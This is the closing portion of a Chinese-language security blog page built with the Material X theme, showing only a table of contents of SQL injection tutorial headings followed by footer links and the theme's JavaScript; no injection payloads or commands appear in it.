      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#sql注入："><span class="toc-text">sql注入：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#get基于报错的注入"><span class="toc-text">get基于报错的注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#get盲注："><span class="toc-text">get盲注：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#基于时间的盲注："><span class="toc-text">基于时间的盲注：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#基于boolean的盲注："><span class="toc-text">基于boolean的盲注：</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#mysql读写文件："><span class="toc-text">mysql读写文件：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#post-基于报错"><span class="toc-text">post 基于报错</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#get报错注入-未完善"><span class="toc-text">get报错注入(未完善)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sql注入绕过"><span class="toc-text">sql注入绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#post-基于时间和布尔值的盲注"><span class="toc-text">post 基于时间和布尔值的盲注</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#http头中的注入"><span class="toc-text">http头中的注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#post-update语句的注入"><span class="toc-text">post_update语句的注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#cookie注入"><span class="toc-text">cookie注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#base64注入"><span class="toc-text">base64注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#绕过去除注释的sql注入"><span class="toc-text">绕过去除注释的sql注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#绕过去除and-or-的sql注入"><span class="toc-text">绕过去除and or 的sql注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#绕过去除空格的sql注入"><span class="toc-text">绕过去除空格的sql注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#宽字节的注入"><span class="toc-text">宽字节的注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Access偏移注入"><span class="toc-text">Access偏移注入</span></a></li></ol></li></ol>
    </div>
  </section>


          
        
      
    

  
</aside>

<footer id="footer" class="clearfix">
  
  
    <div class="social-wrapper">
      
        
          <a href="/atom.xml"
            class="social fas fa-rss flat-btn"
            target="_blank"
            rel="external nofollow noopener noreferrer">
          </a>
        
      
        
          <a href="https://weibo.com/u/6174928918"
            class="social fab fa-weibo flat-btn"
            target="_blank"
            rel="external nofollow noopener noreferrer">
          </a>
        
      
        
          <a href="https://github.com/lacc233"
            class="social fab fa-github flat-btn"
            target="_blank"
            rel="external nofollow noopener noreferrer">
          </a>
        
      
        
          <a href="https://music.163.com/#/user/home?id=1372862909"
            class="social fas fa-headphones-alt flat-btn"
            target="_blank"
            rel="external nofollow noopener noreferrer">
          </a>
        
      
    </div>
  
  <br>
  <div><p>博客内容遵循 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 协议</a></p>
</div>
  <div>
    本站使用
    <a href="https://xaoxuu.com/wiki/material-x/" target="_blank" class="codename">Material X</a>
    作为主题
    
      ，
      总访问量为
      <span id="busuanzi_value_site_pv"><i class="fas fa-spinner fa-spin fa-fw" aria-hidden="true"></i></span>
      次
    
    。
  </div>
</footer>
<script>setLoadingBarProgress(80);</script>


      <script>setLoadingBarProgress(60);</script>
    </div>
    <a class="s-top fas fa-arrow-up fa-fw" href='javascript:void(0)'></a>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>

  <script>
    var GOOGLE_CUSTOM_SEARCH_API_KEY = "";
    var GOOGLE_CUSTOM_SEARCH_ENGINE_ID = "";
    var ALGOLIA_API_KEY = "";
    var ALGOLIA_APP_ID = "";
    var ALGOLIA_INDEX_NAME = "";
    var AZURE_SERVICE_NAME = "";
    var AZURE_INDEX_NAME = "";
    var AZURE_QUERY_KEY = "";
    var BAIDU_API_ID = "";
    var SEARCH_SERVICE = "hexo" || "hexo";
    var ROOT = "/"||"/";
    if(!ROOT.endsWith('/'))ROOT += '/';
  </script>

<script src="//instant.page/1.2.2" type="module" integrity="sha384-2xV8M5griQmzyiY3CDqh1dn4z3llDVqZDqzjzcY+jCBCk/a5fXJmuZ/40JJAPeoU"></script>


  <script async src="https://cdn.jsdelivr.net/npm/scrollreveal@4.0.5/dist/scrollreveal.min.js"></script>
  <script type="text/javascript">
    $(function() {
      const $reveal = $('.reveal');
      if ($reveal.length === 0) return;
      const sr = ScrollReveal({ distance: 0 });
      sr.reveal('.reveal');
    });
  </script>


  <script src="https://cdn.jsdelivr.net/npm/node-waves@0.7.6/dist/waves.min.js"></script>
  <script type="text/javascript">
    $(function() {
      Waves.attach('.flat-btn', ['waves-button']);
      Waves.attach('.float-btn', ['waves-button', 'waves-float']);
      Waves.attach('.float-btn-light', ['waves-button', 'waves-float', 'waves-light']);
      Waves.attach('.flat-box', ['waves-block']);
      Waves.attach('.float-box', ['waves-block', 'waves-float']);
      Waves.attach('.waves-image');
      Waves.init();
    });
  </script>


  <script async src="https://cdn.jsdelivr.net/gh/xaoxuu/cdn-busuanzi@2.3/js/busuanzi.pure.mini.js"></script>




  
  
  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-backstretch/2.0.4/jquery.backstretch.min.js"></script>
    <script type="text/javascript">
      $(function(){
        if ('') {
          $('').backstretch(
          ["https://cdn.jsdelivr.net/gh/lacc233/lacc233.github.io@v1.0/icon/contemporary.jpg"],
          {
            duration: "",
            fade: ""
          });
        } else {
          $.backstretch(
          ["https://cdn.jsdelivr.net/gh/lacc233/lacc233.github.io@v1.0/icon/contemporary.jpg"],
          {
            duration: "",
            fade: ""
          });
        }
      });
    </script>
  









  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  
    
      <script src="https://cdn.jsdelivr.net/gh/xaoxuu/volantis@1.0/js/volantis.min.js"></script>
    
  
  <script>
  var GUEST_INFO = ['nick','mail','link'];
  var guest_info = 'nick,mail,link'.split(',').filter(function(item){
    return GUEST_INFO.indexOf(item) > -1
  });
  var notify = 'true' == true;
  var verify = 'true' == true;
  var valine = new Valine();
  valine.init({
    el: '#valine_container',
    notify: notify,
    verify: verify,
    guest_info: guest_info,
    
    appId: "s80dT3cYg98LwODISJX86IX8-MdYXbMMI",
    appKey: "McmNeSHOdVEeoOB5v3V1OgjD",
    placeholder: "快来评论吧~",
    pageSize:'10',
    avatar:'mp',
    lang:'zh-cn',
    highlight:'true'
  })
  </script>



  <script src="https://cdn.jsdelivr.net/gh/xaoxuu/cdn-material-x@19.5/js/app.js"></script>


  <script src="https://cdn.jsdelivr.net/gh/xaoxuu/cdn-material-x@19.5/js/search.js"></script>




<!-- 复制 -->
<script src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js"></script>
<script>
  let COPY_SUCCESS = "复制成功";
  let COPY_FAILURE = "复制失败";
  /*页面载入完成后，创建复制按钮*/
  !function (e, t, a) {
    /* code */
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '  <i class="fa fa-copy"></i><span>复制</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });

      clipboard.on('success', function(e) {
        //您可以加入成功提示
        console.info('Action:', e.action);
        console.info('Text:', e.text);
        console.info('Trigger:', e.trigger);
        success_prompt(COPY_SUCCESS);
        e.clearSelection();
      });
      clipboard.on('error', function(e) {
        //您可以加入失败提示
        console.error('Action:', e.action);
        console.error('Trigger:', e.trigger);
        fail_prompt(COPY_FAILURE);
      });
    }
    initCopyCode();

  }(window, document);

  /**
   * 弹出式提示框，默认1.5秒自动消失
   * @param message 提示信息
   * @param style 提示样式，有alert-success、alert-danger、alert-warning、alert-info
   * @param time 消失时间
   */
  var prompt = function (message, style, time)
  {
      style = (style === undefined) ? 'alert-success' : style;
      time = (time === undefined) ? 1500 : time*1000;
      $('<div>')
          .appendTo('body')
          .addClass('alert ' + style)
          .html(message)
          .show()
          .delay(time)
          .fadeOut();
  };

  // 成功提示
  var success_prompt = function(message, time)
  {
      prompt(message, 'alert-success', time);
  };

  // 失败提示
  var fail_prompt = function(message, time)
  {
      prompt(message, 'alert-danger', time);
  };

  // 提醒
  var warning_prompt = function(message, time)
  {
      prompt(message, 'alert-warning', time);
  };

  // 信息提示
  var info_prompt = function(message, time)
  {
      prompt(message, 'alert-info', time);
  };

</script>


<!-- fancybox -->
<script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
<script>
  let LAZY_LOAD_IMAGE = "";
  $(".article-entry").find("fancybox").find("img").each(function () {
      var element = document.createElement("a");
      $(element).attr("data-fancybox", "gallery");
      $(element).attr("href", $(this).attr("src"));
      /* 图片采用懒加载处理时,
       * 一般图片标签内会有个属性名来存放图片的真实地址，比如 data-original,
       * 那么此处将原本的属性名src替换为对应属性名data-original,
       * 修改如下
       */
       if (LAZY_LOAD_IMAGE) {
         $(element).attr("href", $(this).attr("data-original"));
       }
      $(this).wrap(element);
  });
</script>





  <script>setLoadingBarProgress(100);</script>
</body>
</html>
